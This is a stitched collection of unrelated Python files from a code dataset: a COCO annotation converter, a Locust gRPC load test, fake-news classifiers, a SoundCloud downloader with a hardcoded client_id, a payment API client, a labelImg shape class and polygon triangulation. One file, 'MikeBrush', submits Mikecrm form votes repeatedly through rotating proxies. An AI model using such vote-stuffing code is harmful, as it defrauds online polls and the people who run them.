for tumor_anno_filename in tumor_anno_files:
class_id = [x['id'] for x in CATEGORIES]
t_category_info = {'id': class_id[0], 'is_crowd': 0}
t_binary_mask = np.asarray(Image.open(tumor_anno_filename)
.convert('1')).astype(np.uint8)
t_anno_info = pycococreatortools.create_annotation_info(
segmentation_id, image_id, t_category_info, t_binary_mask,
image.size, tolerance=2)
if t_anno_info is not None:
coco_output["annotations"].append(t_anno_info)
segmentation_id = segmentation_id + 1
for wall_anno_filename in wall_anno_files:
class_id = [x['id'] for x in CATEGORIES]
w_category_info = {'id': class_id[1], 'is_crowd': 0}
w_binary_mask = np.asarray(Image.open(wall_anno_filename)
.convert('1')).astype(np.uint8)
w_anno_info = pycococreatortools.create_annotation_info(
segmentation_id, image_id, w_category_info, w_binary_mask,
image.size, tolerance=2)
if w_anno_info is not None:
coco_output["annotations"].append(w_anno_info)
segmentation_id = segmentation_id + 1
image_id = image_id + 1
with open('{}/rectal_seg_test.json'.format(ROOT_DIR), 'w') as output_json_file:
json.dump(coco_output, output_json_file)
if __name__ == "__main__":
main() |
the-stack_0_6606 | # make sure you use grpc version 1.39.0 or later,
# because of https://github.com/grpc/grpc/issues/15880 that affected earlier versions
import grpc
import hello_pb2_grpc
import hello_pb2
from locust import events, User, task
from locust.exception import LocustError
from locust.user.task import LOCUST_STATE_STOPPING
from hello_server import start_server
import gevent
import time
# patch grpc so that it uses gevent instead of asyncio
import grpc.experimental.gevent as grpc_gevent
grpc_gevent.init_gevent()
@events.init.add_listener
def run_grpc_server(environment, **_kwargs):
# Start the dummy server. This is not something you would do in a real test.
gevent.spawn(start_server)
class GrpcClient:
def __init__(self, stub):
self._stub_class = stub.__class__
self._stub = stub
def __getattr__(self, name):
func = self._stub_class.__getattribute__(self._stub, name)
def wrapper(*args, **kwargs):
request_meta = {
"request_type": "grpc",
"name": name,
"start_time": time.time(),
"response_length": 0,
"exception": None,
"context": None,
"response": None,
}
start_perf_counter = time.perf_counter()
try:
request_meta["response"] = func(*args, **kwargs)
request_meta["response_length"] = len(request_meta["response"].message)
except grpc.RpcError as e:
request_meta["exception"] = e
request_meta["response_time"] = (time.perf_counter() - start_perf_counter) * 1000
events.request.fire(**request_meta)
return request_meta["response"]
return wrapper
class GrpcUser(User):
abstract = True
stub_class = None
def __init__(self, environment):
super().__init__(environment)
for attr_value, attr_name in ((self.host, "host"), (self.stub_class, "stub_class")):
if attr_value is None:
raise LocustError(f"You must specify the {attr_name}.")
self._channel = grpc.insecure_channel(self.host)
self._channel_closed = False
stub = self.stub_class(self._channel)
self.client = GrpcClient(stub)
class HelloGrpcUser(GrpcUser):
host = "localhost:50051"
stub_class = hello_pb2_grpc.HelloServiceStub
@task
def sayHello(self):
if not self._channel_closed:
self.client.SayHello(hello_pb2.HelloRequest(name="Test"))
time.sleep(1)
|
the-stack_0_6608 | import numpy as np
import os
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import RidgeClassifier
from sklearn.model_selection import train_test_split, KFold
from sklearn.metrics import classification_report, confusion_matrix
from pymongo import MongoClient
import datetime
import sys
sys.path.append('../..')
import utils.dbUtils
import utils.gensimUtils
client = MongoClient('localhost', 27017)
db = client.TFE
collection = db.results5
def train_and_test(experiment_id, max_features = None):
print("Using max features : {}".format(max_features))
idx = collection.insert_one({'date' : datetime.datetime.now(), 'corpus' : 'news_cleaned', 'max_features' : max_features, 'experiment_id' : experiment_id})
print("Making dataset")
train = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$nin' : ['nytimes.com', 'beforeitsnews.com']}})
y_train = np.array([x for x in train.iterTags()])
test = utils.dbUtils.TokenizedIterator('news_cleaned', filters = {'type' : {'$in' : ['fake', 'reliable']}, 'domain' : {'$in' : ['nytimes.com', 'beforeitsnews.com']}})
y_test = np.array([x for x in test.iterTags()])
print("Fiting tf-idf")
vectorizer = TfidfVectorizer(max_features = max_features)
X_train = vectorizer.fit_transform([' '.join(news) for news in train])
X_test = vectorizer.transform([' '.join(news) for news in test])
print("Fiting linearSVC")
model = LinearSVC()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'LinearSVC',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("MultinomialNB")
model = MultinomialNB()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'MultinomialNB',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("DecisionTreeClassifier")
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'DecisionTreeClassifier',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
print("RidgeClassifier")
model = RidgeClassifier()
model.fit(X_train, y_train)
crp = classification_report(y_test, model.predict(X_test), labels=['fake', 'reliable'], output_dict = True)
collection.update_one({'_id' : idx.inserted_id},
{
'$push' :
{'report' :
{'model' : 'RidgeClassifier',
'classification_report' : crp,
'train_accuracy' : model.score(X_train, y_train),
'test_accuracy' : model.score(X_test, y_test),
'confusion matrix' :
{
'train' : list(map(int, confusion_matrix(y_train, model.predict(X_train), labels=['fake', 'reliable']).ravel())),
'test' : list(map(int, confusion_matrix(y_test, model.predict(X_test), labels=['fake', 'reliable']).ravel()))
}
}
}
})
if __name__ == "__main__":
max_features = [10000, 50000, 100000, 250000, 500000, 1000000]
for features in max_features:
train_and_test(13, features) |
the-stack_0_6609 | import logging
from threading import Thread
from .mikecrm import Mikecrm
class MikeBrush():
def __init__(self, target, proxys, count):
'''
Brush for voting on mike
:param target: {"page":"", "data":""}
:param proxys: Queue for {"type":"", "ip":"", "port":00}
:param count: number of threadings
'''
self.target = target
self.proxys = proxys
self.count = count
self.total = 0
self.votes = 0
def brush_schedule(self, index):
proxys = self.proxys
brush = Mikecrm(**self.target)
logging.info('Brush thead-%d : task started!' % index)
while not proxys.empty():
proxy = proxys.get_nowait()
self.total += 1
if brush.set_proxy(*proxy).submit():
self.votes += 1
logging.info('Current successes count is %d / %d' % (self.votes, self.total))
logging.info('Brush thead-%d : task complete!' % index)
def run(self, block=True):
tasks = []
for index in range(self.count):
task = Thread(name='Theading-%d'%(index+1), target=self.brush_schedule, args=(index,))
tasks.append(task)
task.start()
logging.info('Brush tasks all started!')
if block:
for task in tasks:
task.join()
logging.info('Brush tasks all complete!')
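
# Added usage sketch (not in the original module); the target strings and the
# proxy record below are placeholders for whatever Mikecrm and the surrounding
# project expect:
#
#   from queue import Queue
#   proxy_queue = Queue()
#   proxy_queue.put({"type": "http", "ip": "127.0.0.1", "port": 8080})
#   target = {"page": "<mike form page>", "data": "<form payload>"}
#   MikeBrush(target=target, proxys=proxy_queue, count=4).run(block=True)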
|
the-stack_0_6610 | #!/usr/bin/env python
__all__ = ['soundcloud_download', 'soundcloud_download_by_id']
from ..common import *
import json
import urllib.error
client_id = 'WKcQQdEZw7Oi01KqtHWxeVSxNyRzgT8M'
def soundcloud_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False):
assert title
url = 'https://api.soundcloud.com/tracks/{}/{}?client_id={}'.format(id, 'stream', client_id)
type, ext, size = url_info(url)
print_info(site_info, title, type, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge = merge)
def soundcloud_i1_api(track_id):
url = 'https://api.soundcloud.com/i1/tracks/{}/streams?client_id={}'.format(track_id, client_id)
return json.loads(get_content(url))['http_mp3_128_url']
def soundcloud_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
url = 'https://api.soundcloud.com/resolve.json?url={}&client_id={}'.format(url, client_id)
metadata = get_content(url)
info = json.loads(metadata)
title = info["title"]
    real_url = info.get('download_url')
    if real_url is None:
        real_url = info.get('stream_url')
    if real_url is None:
        # Fall back to the i1 streams endpoint when the resolve payload
        # exposes neither a download nor a stream URL.
        real_url = soundcloud_i1_api(info['id'])
    if real_url is None:
        raise Exception('Cannot get media URI for {}'.format(url))
mime, ext, size = url_info(real_url)
print_info(site_info, title, mime, size)
if not info_only:
download_urls([real_url], title, ext, size, output_dir, merge=merge)
site_info = "SoundCloud.com"
download = soundcloud_download
download_playlist = playlist_not_supported('soundcloud')
|
the-stack_0_6612 | import os
import pandas as pd
import yaml
from tqdm import tqdm
class ResLogger:
def __init__(self, path):
self.path = path
if not os.path.isdir(path):
os.mkdir(path)
# Infer the last result computation that has been run
if os.path.isfile(path+'res.csv'):
with open(path+'res.csv', 'r') as res:
lines = res.readlines()
# File is empty with no header
if len(lines) == 0:
self.header = False
self.last_run = None
# File has header
else:
                    first_line = lines[0]
                    last_line = lines[-1]
                    self.columns = pd.Index((first_line[1:]
                                             .rstrip().split(',')))
                    self.header = True
                    # File contains only the header line
                    if len(lines) == 1:
                        self.last_run = None
                    # Previous result computations exist
                    else:
                        self.last_run = int(last_line.split(',')[0])
# If result file does not exist
else:
self.header = False
self.last_run = None
def __enter__(self):
self.res = open(self.path+'res.csv', 'a').__enter__()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.res.__exit__(exc_type, exc_value, traceback)
def write_header(self, columns):
self.columns = columns
for column in columns:
self.res.write(','+column)
self.res.write('\n')
def write_res(self, idx, res_series):
res_list = res_series[self.columns].values
self.res.write(str(idx))
for res in res_list:
self.res.write(','+str(res))
self.res.write('\n')
def run_simulations(path, net, metrics, simulation_step_func,
until=None, overwrite=False):
# Load simulation inputs
with open(path+'input_config.yaml', 'r') as config_file:
eq_list = yaml.safe_load(config_file)
eq_frame_dict = {}
for (element, quantity) in eq_list:
eq_frame = pd.read_csv(path+f'{element}_{quantity}.csv',
index_col=0)
eq_frame_dict[(element, quantity)] = eq_frame
# Set final simulation step
    if until is None:
stop = len(eq_frame.index)
else:
stop = until
# Logic for applying n-th inputs and running simulation step
def set_eq_and_run(n):
for (e_name, q_name), q_value in eq_frame_dict.items():
q_series = pd.Series(q_value.loc[n, :], name=q_name)
set_eq_by_element_name(net, e_name, q_series)
return simulation_step_func(net, metrics)
# Check progress with logger
with ResLogger(path) as l:
# If no header, run zeroth simulation step to infer column names
if not l.header:
progress = iter(tqdm(range(stop)))
results = set_eq_and_run(next(progress))
l.write_header(results.index)
l.write_res(0, results)
# If header but no last run, start from beginning
elif not l.last_run:
progress = tqdm(range(stop))
# Otherwise start after last run
else:
progress = tqdm(range(l.last_run + 1, stop))
# Main loop
for n in progress:
results = set_eq_and_run(n)
l.write_res(n, results)
def init_simulations(path, eq_frame_dict):
if not os.path.isdir(path):
os.mkdir(path)
eq_list = []
for (element, quantity), eq_frame in eq_frame_dict.items():
eq_frame.to_csv(path+f'{element}_{quantity}.csv')
eq_list.append([element, quantity])
with open(path+'input_config.yaml', 'w') as config_file:
yaml.dump(eq_list, config_file)
def set_eq_by_element_name(net, element, eq_series):
pp_idx = getattr(net, element + '_name_map')[eq_series.index]
getattr(net, element).loc[pp_idx, eq_series.name] = eq_series.values |
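
# Added usage sketch (not in the original module). `net`, `metrics` and
# `my_step` below are placeholders for objects supplied by the surrounding
# project; only the call order and the resume behaviour are illustrated.
#
#   eq_frames = {("load", "p_mw"): load_profiles}      # one DataFrame per (element, quantity)
#   init_simulations("runs/exp1/", eq_frames)          # writes the CSV inputs + input_config.yaml
#   run_simulations("runs/exp1/", net, metrics, my_step)
#
# Because ResLogger records the index of the last row written to res.csv,
# calling run_simulations() again after an interruption resumes from the first
# missing step instead of recomputing everything.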
the-stack_0_6617 | # coding:utf-8
import os
import logging
import datetime
import requests
import json
from pagarme.config import __endpoint__, __user_agent__
from pagarme.common import merge_dict, make_url
from pagarme import exceptions
logger = logging.getLogger('pygarme')
class PagarmeApi(object):
def __init__(self, options=None, **kwargs):
"""`PagarmeApi`:class: Creates an API object
"""
kwargs = merge_dict(options or {}, kwargs)
self.endpoint = kwargs.get('endpoint', self.default_endpoint)
self.apikey = kwargs.get('api_key')
self.encryption_key = kwargs.get('encryption_key')
if not self.apikey or not self.encryption_key:
raise exceptions.NullAPIKeyError('The `api_key` and `encryption_key` must be set.')
@property
def default_endpoint(self):
"""Returns the default endpoint
"""
return __endpoint__
@property
def default_user_agent(self):
"""Returns the api user agent
"""
return __user_agent__
@property
def default_headers(self):
"""Returns the default headers
"""
return {
"Content-Type": "application/json",
"Accept": "application/json",
"User-Agent": self.default_user_agent
}
def request(self, url, method, data=None, headers=None):
"""Makes a HTTP call, formats response and does error handling.
"""
http_headers = merge_dict(self.default_headers, headers or {})
request_data = merge_dict({'api_key': self.apikey}, data or {})
logger.info('HTTP %s REQUEST TO %s' % (method, url))
start = datetime.datetime.now()
try:
response = requests.request(method=method, url=url, data=json.dumps(request_data),
headers=http_headers)
except exceptions.BadRequestError as e:
            return {'errors': e.content}
duration = datetime.datetime.now() - start
logger.info('RESPONSE %s DURATION %s.%s' % (response.encoding, duration.seconds,
duration.microseconds))
return json.loads(response.content) if response.content else {}
def get(self, action, params=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='GET', data=params,
headers=headers)
def post(self, action, data=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='POST', data=data,
headers=headers)
def put(self, action, data=None, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='PUT', data=data,
headers=headers)
def delete(self, action, headers=None):
"""Makes a GET request
"""
return self.request(make_url(self.endpoint, action), method='DELETE',
headers=headers)
__default_api__ = None
def default_api():
global __default_api__
if __default_api__ is None:
try:
api_key = os.environ["PAGARME_API_KEY"]
encryption_key = os.environ["PAGARME_ENCRYPTION_KEY"]
except KeyError:
raise exceptions.NullAPIKeyError("Required PAGARME_API_KEY and PAGARME_ENCRYPTION_KEY")
__default_api__ = PagarmeApi(api_key=api_key, encryption_key=encryption_key)
return __default_api__
def configure(**kwargs):
global __default_api__
__default_api__ = PagarmeApi(**kwargs)
return __default_api__
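
# Added usage sketch (not in the original file). The keys below are
# placeholders; real values normally come from the PAGARME_API_KEY /
# PAGARME_ENCRYPTION_KEY environment variables read by default_api(), or are
# passed explicitly to configure().
#
#   configure(api_key="ak_test_...", encryption_key="ek_test_...")
#   api = default_api()
#   transactions = api.get("transactions", params={"count": 10})
#
# configure() replaces the module-level singleton, so every later call to
# default_api() reuses the same credentials.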
|
the-stack_0_6620 | #!/usr/bin/python
# -*- coding: utf-8 -*-
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
except ImportError:
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from libs.utils import distance
import sys
DEFAULT_LINE_COLOR = QColor(0, 255, 0, 128)
DEFAULT_FILL_COLOR = QColor(255, 0, 0, 128)
DEFAULT_SELECT_LINE_COLOR = QColor(255, 255, 255)
DEFAULT_SELECT_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_VERTEX_FILL_COLOR = QColor(0, 255, 0, 255)
DEFAULT_HVERTEX_FILL_COLOR = QColor(255, 0, 0)
MIN_Y_LABEL = 10
class Shape(object):
P_SQUARE, P_ROUND = range(2)
MOVE_VERTEX, NEAR_VERTEX = range(2)
# The following class variables influence the drawing
# of _all_ shape objects.
line_color = DEFAULT_LINE_COLOR
fill_color = DEFAULT_FILL_COLOR
select_line_color = DEFAULT_SELECT_LINE_COLOR
select_fill_color = DEFAULT_SELECT_FILL_COLOR
vertex_fill_color = DEFAULT_VERTEX_FILL_COLOR
hvertex_fill_color = DEFAULT_HVERTEX_FILL_COLOR
point_type = P_ROUND
point_size = 8
scale = 1.0
def __init__(self, label=None, line_color=None, difficult=False, paintLabel=False):
self.label = label
self.points = []
self.fill = False
self.selected = False
self.difficult = difficult
self.paintLabel = paintLabel
self._highlightIndex = None
self._highlightMode = self.NEAR_VERTEX
self._highlightSettings = {
self.NEAR_VERTEX: (4, self.P_ROUND),
self.MOVE_VERTEX: (1.5, self.P_SQUARE),
}
self._closed = False
if line_color is not None:
# Override the class line_color attribute
# with an object attribute. Currently this
# is used for drawing the pending line a different color.
self.line_color = line_color
def close(self):
self._closed = True
def setPoints(self, points):
self.points = []
for p in points:
self.points.append(QPointF(p[0],p[1]))
def reachMaxPoints(self):
if len(self.points) >= 4:
return True
return False
def addPoint(self, point):
if not self.reachMaxPoints():
self.points.append(point)
def popPoint(self):
if self.points:
return self.points.pop()
return None
def isClosed(self):
return self._closed
def setOpen(self):
self._closed = False
def paint(self, painter):
if self.points:
color = self.select_line_color if self.selected else self.line_color
pen = QPen(color)
# Try using integer sizes for smoother drawing(?)
pen.setWidth(max(1, int(round(2.0 / self.scale))))
painter.setPen(pen)
line_path = QPainterPath()
vrtx_path = QPainterPath()
line_path.moveTo(self.points[0])
# Uncommenting the following line will draw 2 paths
# for the 1st vertex, and make it non-filled, which
# may be desirable.
#self.drawVertex(vrtx_path, 0)
for i, p in enumerate(self.points):
line_path.lineTo(p)
self.drawVertex(vrtx_path, i)
if self.isClosed():
line_path.lineTo(self.points[0])
painter.drawPath(line_path)
painter.drawPath(vrtx_path)
painter.fillPath(vrtx_path, self.vertex_fill_color)
# Draw text at the top-left
if self.paintLabel:
min_x = sys.maxsize
min_y = sys.maxsize
for point in self.points:
min_x = min(min_x, point.x())
min_y = min(min_y, point.y())
if min_x != sys.maxsize and min_y != sys.maxsize:
font = QFont()
font.setPointSize(8)
font.setBold(True)
painter.setFont(font)
                    if self.label is None:
                        self.label = ""
if(min_y < MIN_Y_LABEL):
min_y += MIN_Y_LABEL
painter.drawText(min_x, min_y, self.label)
if self.fill:
color = self.select_fill_color if self.selected else self.fill_color
painter.fillPath(line_path, color)
def drawVertex(self, path, i):
d = self.point_size / self.scale
shape = self.point_type
point = self.points[i]
if i == self._highlightIndex:
size, shape = self._highlightSettings[self._highlightMode]
d *= size
if self._highlightIndex is not None:
self.vertex_fill_color = self.hvertex_fill_color
else:
self.vertex_fill_color = Shape.vertex_fill_color
if shape == self.P_SQUARE:
path.addRect(point.x() - d / 2, point.y() - d / 2, d, d)
elif shape == self.P_ROUND:
path.addEllipse(point, d / 2.0, d / 2.0)
else:
assert False, "unsupported vertex shape"
def nearestVertex(self, point, epsilon):
for i, p in enumerate(self.points):
if distance(p - point) <= epsilon:
return i
return None
def containsPoint(self, point):
return self.makePath().contains(point)
def makePath(self):
path = QPainterPath(self.points[0])
for p in self.points[1:]:
path.lineTo(p)
return path
def boundingRect(self):
return self.makePath().boundingRect()
def moveBy(self, offset):
self.points = [p + offset for p in self.points]
def moveVertexBy(self, i, offset):
self.points[i] = self.points[i] + offset
def highlightVertex(self, i, action):
self._highlightIndex = i
self._highlightMode = action
def highlightClear(self):
self._highlightIndex = None
def copy(self):
shape = Shape("%s" % self.label)
shape.points = [p for p in self.points]
shape.fill = self.fill
shape.selected = self.selected
shape._closed = self._closed
if self.line_color != Shape.line_color:
shape.line_color = self.line_color
if self.fill_color != Shape.fill_color:
shape.fill_color = self.fill_color
shape.difficult = self.difficult
return shape
def __len__(self):
return len(self.points)
def __getitem__(self, key):
return self.points[key]
def __setitem__(self, key, value):
self.points[key] = value
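
# Added illustration (not in the original file): the class-level attributes
# documented above act as defaults for every shape, while the line_color
# argument overrides a single instance:
#
#   Shape.line_color = QColor(255, 255, 0, 128)                 # affects all shapes
#   special = Shape("special", line_color=QColor(255, 0, 255))  # only this one
#   special.addPoint(QPointF(10, 10))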
|
the-stack_0_6623 | from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='midi-websocket-server',
version='1.0.0',
description='Python Websocket server to facilitate two-way communication with all connected MIDI devices.',
long_description=readme,
url='https://github.com/PeterSR/python-midi-websocket-server',
author='Peter Severin Rasmussen',
author_email='[email protected]',
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.7',
],
packages=find_packages(exclude=('tests', 'docs')),
install_requires=[
'websockets>=8.1',
'python-rtmidi>=1.4.0',
],
python_requires='>=3.7',
) |
the-stack_0_6625 | # Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import cast
import numpy as np
import numpy.typing as npt
def shubert(x1: float, x2: float) -> float:
"""https://www.sfu.ca/~ssurjano/shubert.html."""
factor_1 = np.sum([i * np.cos((i + 1) * x1 + i) for i in range(1, 6)])
factor_2 = np.sum([i * np.cos((i + 1) * x2 + i) for i in range(1, 6)])
return cast(float, factor_1 * factor_2)
def shubert_np(x: npt.NDArray[np.floating]) -> float:
if len(x) != 2:
raise AssertionError("Exactly 2 items expected")
return shubert(x[0], x[1])
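
# Added usage sketch (not in the original file): a coarse grid evaluation of
# the Shubert test function. The page cited in the docstring reports a global
# minimum of roughly -186.73 inside [-10, 10]^2.
if __name__ == "__main__":
    grid = np.linspace(-2.0, 2.0, 201)
    best = min(shubert(a, b) for a in grid for b in grid)
    print("best value on the grid:", best)
    print("shubert_np at the origin:", shubert_np(np.array([0.0, 0.0])))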
|
the-stack_0_6628 | from vector2D import Vector2D as vec
from typing import List, Tuple
Point = Tuple[int, int]
def ear_clipping(polygon: List[Point]) -> List[List[Point]]:
if len(polygon) > 3:
polygon = vec.convert(polygon)
total_triangles = len(polygon) - 2
triangles = []
while len(triangles) < total_triangles:
for ind, center_point in enumerate(polygon):
right_point = polygon[(ind + 1) % len(polygon)]
left_point = polygon[(ind - 1) % len(polygon)]
if left_point.cross(right_point, origin=center_point) > 0:
temp_triangle = (left_point, center_point, right_point)
check_triangle_validity = lambda point: point not in temp_triangle and point.in_polygon(temp_triangle)
if not any(filter(check_triangle_validity, polygon)):
triangles.append(temp_triangle)
polygon.pop(ind)
return triangles
return polygon
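
# Added usage sketch (not part of the original module). It assumes the
# companion Vector2D class provides convert/cross/in_polygon as used above;
# the square is listed counter-clockwise to match the cross(...) > 0
# convexity test.
if __name__ == "__main__":
    square = [(0, 0), (4, 0), (4, 4), (0, 4)]
    for triangle in ear_clipping(square):
        print(triangle)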
|